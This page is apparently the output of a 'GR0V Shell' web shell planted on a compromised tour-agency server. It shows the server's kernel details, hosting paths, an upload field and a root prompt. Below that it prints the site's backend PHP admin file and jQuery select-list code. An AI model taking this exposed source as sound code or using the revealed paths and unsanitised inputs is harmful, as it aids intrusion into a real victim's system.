? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/backend/modules/tour/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/backend/modules/tour/action.php

<?php
require_once('com_article.php');
require_once('mod_article.php');
require_once('com_topic.php');
require_once('Countdown.php');
$topic=new topic();
$article=new article();
$Countdown=new Countdown();
$Html=new Html();
echo $Html->menu();
if($_GET['msg']!=""){echo msg_feedback($_GET['msg']);}
switch($_GET['ac']){
case edit;{
	echo $Html->Edit();
break;
}
default:
$header_name=Array(							
					'image'=> "รูปภาพ",
					'name'=> "ชื่อทัวร์",							
					);
$header_td_width=Array('57%','19%');
$orderby=$_GET['orderby'];
$sort=$_GET['sort'];
if($sort==""){$sort="Max2Min";}
$chksort=$_GET['chksort'];
$link="admin.php?mod=tour";
$topic->setLimit(20);
$topic->setPage();
 $topic->total_links(9);
echo "<div style=\"text-align:left;\">";
if ($_SESSION["la"] == 1){
echo $topic->listData($table='tour',$condition='',$orderby,$sort,$chksort,$header_name,$header_td_width,$link);
}else{
echo $topic->listData($table='tour_en',$condition='',$orderby,$sort,$chksort,$header_name,$header_td_width,$link);
}

echo "</div>";
break;

case new_data;{
require_once('com_new_topic.php');
break;
}
case edit_data;{
	require_once('com_edit_topic.php');
break;
}
case cadit_card;{
require_once('com_topic_card.php');
$topic_card=new topic_card();
	$header_name=Array(							
					'name'=> "ชื่อ",
					'picture'=> "รูปภาพ",							
					);
	$header_td_width=Array('57%','19%');
	$orderby=$_GET['orderby'];
	$sort=$_GET['sort'];
	if($sort==""){$sort="Max2Min";}
	$chksort=$_GET['chksort'];
	$link="admin.php?mod=tour";
	$topic_card->setLimit(20);
	$topic_card->setPage();
	$topic_card->total_links(9);
	echo "<div style=\"text-align:left;\">";
	echo $topic_card->listData($table='cadit_card',$condition='',$orderby,$sort,$chksort,$header_name,$header_td_width,$link);
	echo "</div>";
	
break;
}

case delete_photo_gallery;{
	$article->delete_photo_gallery();
	break;
}
case add_data;{
	$article->add_topic();
	break;
}
//add view
case edit_data_do;{
	$topic_id=$_POST['topic_id'];
	$article->edit_topic($topic_id);
break;
}
case del_data;{
	$article->del_topic();
	break;
}
case del_data_credit;{
	$article->del_data_credit();
	break;
}
case add_data_credit;{
	require_once('com_new_credit.php');
break;
}
case edit_data_credit;{
	require_once('com_edit_credit.php');
break;
}
case view_cat;{
	require_once('manage_group.php');
break;
}
case del_word:
		$article->del_word();
		break;
case del_pdf:
		$article->del_pdf();
		break;
case del_rar:
		$article->del_rar();
		break;
case idx_list:
		$header_name=Array(	
							'tour.name'=> "ชื่อทัวร์",
							'tour.image'=> "รูปภาพ",
							'tour_cat.CatName'=> "หมวดหมู่ทัวร์",							
							);
		$header_td_width=Array('60%','20%','10%');
		$orderby=$_GET['orderby'];
		$sort=$_GET['sort'];
		if($sort==""){$sort="Max2Min";}
		$chksort=$_GET['chksort'];
		$link="admin.php?mod=tour&ac=idx_list";
		$topic->setLimit(20);
		$topic->setPage();
		 $topic->total_links(9);
		echo "<div style=\"text-align:left;\">";
		if ($_SESSION["la"] == 1){
		echo $topic->listData_idx_list($table=' tour INNER JOIN tour_recommend ON (tour.id = tour_recommend.tourID) INNER JOIN tour_cat ON ( tour.catagory = tour_cat.CatID ) ',$condition='',$orderby,$sort,$chksort,$header_name,$header_td_width,$link);
}else{
		echo $topic->listData_idx_list($table=' tour_en INNER JOIN tour_recommend_en ON (tour_en.id = tour_recommend_en.tourID) INNER JOIN tour_cat_en ON ( tour_en.catagory = tour_cat_en.CatID ) ',$condition='',$orderby,$sort,$chksort,$header_name,$header_td_width,$link);
}

		echo "</div>";
		break;
}//end switch

?>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>    
<script type="text/javascript">  
$(function(){  
      
    // เมื่อเปลี่ยนค่าของ select id เท่ากับ list1  
     $("select#parent").change(function(){    
         // ส่งค่า ตัวแปร list1 มีค่าเท่ากับค่าที่เลือก ส่งแบบ get ไปที่ไฟล์ data_for_list2.php  
         $.get("data_list1.php",{  
             parent:$(this).val()  
         },function(data){ // คืนค่ากลับมา  
                $("select#parent_2").html(data);  // นำค่าที่ได้ไปใส่ใน select id เท่ากับ list2        
                $("select#parent_2").trigger("change"); // อัพเดท list2 เพื่อให้ list2 ทำงานสำหรับรีเซ็ตค่า  
         });  
    }); 
    // เมื่อเปลี่ยนค่าของ select id เท่ากับ list1  
     $("select#parent_2").change(function(){    
         // ส่งค่า ตัวแปร list1 มีค่าเท่ากับค่าที่เลือก ส่งแบบ get ไปที่ไฟล์ data_for_list2.php  
         $.get("modules/tour/data_list2.php",{  
             parent_2:$(this).val()  
         },function(data){ // คืนค่ากลับมา  
                $("select#parent_3").html(data);  // นำค่าที่ได้ไปใส่ใน select id เท่ากับ list2        
                $("select#parent_3").trigger("change"); // อัพเดท list2 เพื่อให้ list2 ทำงานสำหรับรีเซ็ตค่า  
         });  
    }); 
    // เมื่อเปลี่ยนค่าของ select id เท่ากับ list1  
     $("select#parent_3").change(function(){    
         // ส่งค่า ตัวแปร list1 มีค่าเท่ากับค่าที่เลือก ส่งแบบ get ไปที่ไฟล์ data_for_list2.php  
         $.get("modules/tour/data_list3.php",{  
             parent_3:$(this).val()  
         },function(data){ // คืนค่ากลับมา  
                $("select#parent_4").html(data);  // นำค่าที่ได้ไปใส่ใน select id เท่ากับ list2        
                $("select#parent_4").trigger("change"); // อัพเดท list2 เพื่อให้ list2 ทำงานสำหรับรีเซ็ตค่า  
         });  
    });                    
      
});  
</script> 

T1KUS90T
  root-grov@210.1.60.28:~$